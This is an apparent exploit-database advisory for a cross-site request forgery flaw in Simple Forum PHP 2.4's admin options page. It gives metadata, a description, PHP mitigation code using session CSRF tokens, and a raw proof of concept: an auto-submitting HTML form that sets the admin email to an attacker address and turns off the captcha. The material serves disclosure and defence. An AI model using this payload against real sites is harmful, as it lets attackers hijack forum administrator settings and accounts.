Vendor: Simple Forum PHP
By: Ashiyane Digital Security Team
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Simple Forum PHP
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: NO
Related CWE: N/A
CPE: 2.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WebApp - PHP
2016

Simple Forum PHP 2.4 – Cross-Site Request Forgery (Edit Options)

Simple Forum PHP 2.4 is vulnerable to Cross-Site Request Forgery (CSRF) in the 'admin.php' page. An attacker can exploit this vulnerability to change admin options such as email, captcha, captcha theme, items link, and time zone. The attacker crafts a malicious HTML page and sends it to the admin of the application. When the admin visits the malicious page, the options are updated to the attacker's values.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.
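
One way to implement the token check described above, as an added example in PHP (not code from Simple Forum PHP or from the advisory). The helper names, the `csrf_token` field and the session key are assumptions; the `act=updateOptionsAdmin` parameter is the one used by the request shown on this page.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; not taken from Simple Forum PHP's source.
// SameSite is defence in depth on top of the token (array form needs PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

function csrf_token(): string
{
    // One unpredictable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_token_is_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // Reject missing or non-string input (e.g. csrf_token[]=x), then
    // compare in constant time.
    return is_string($expected) && $expected !== ''
        && is_string($submitted) && $submitted !== ''
        && hash_equals($expected, $submitted);
}

$act = $_POST['act'] ?? '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $act === 'updateOptionsAdmin') {
    // A cross-site form cannot read the session's token, so its request
    // arrives without a matching value and is refused here.
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The application's existing option-update logic runs only past this point.
}
?>
<form action="admin.php" method="POST">
  <input type="hidden" name="act" value="updateOptionsAdmin">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <!-- email, captcha, captcha_theme, items_link, time_zone fields go here -->
  <input type="submit" value="Save options">
</form>
```

The same check belongs in front of every other state-changing `act` handler in the admin page, not only the options update.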

Exploit-DB raw data:

<!--
=====================================================
# Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# Exploit:
-->
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://localhost/blog/admin.php" method="POST">
      <input type="hidden" name="act" value="addPost" />
      <input type="hidden" name="act" value="updateOptionsAdmin" />
      <input type="hidden" name="email" value="attacker@mail.com" />
      <input type="hidden" name="captcha" value="nocap" /> <!--Set No Captcha(unsecured)-->
      <input type="hidden" name="captcha_theme" value="White theme" />
      <input type="hidden" name="items_link" value="http://localhost/demo_forum.php" />
      <input type="hidden" name="time_zone" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>
<!--
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
-->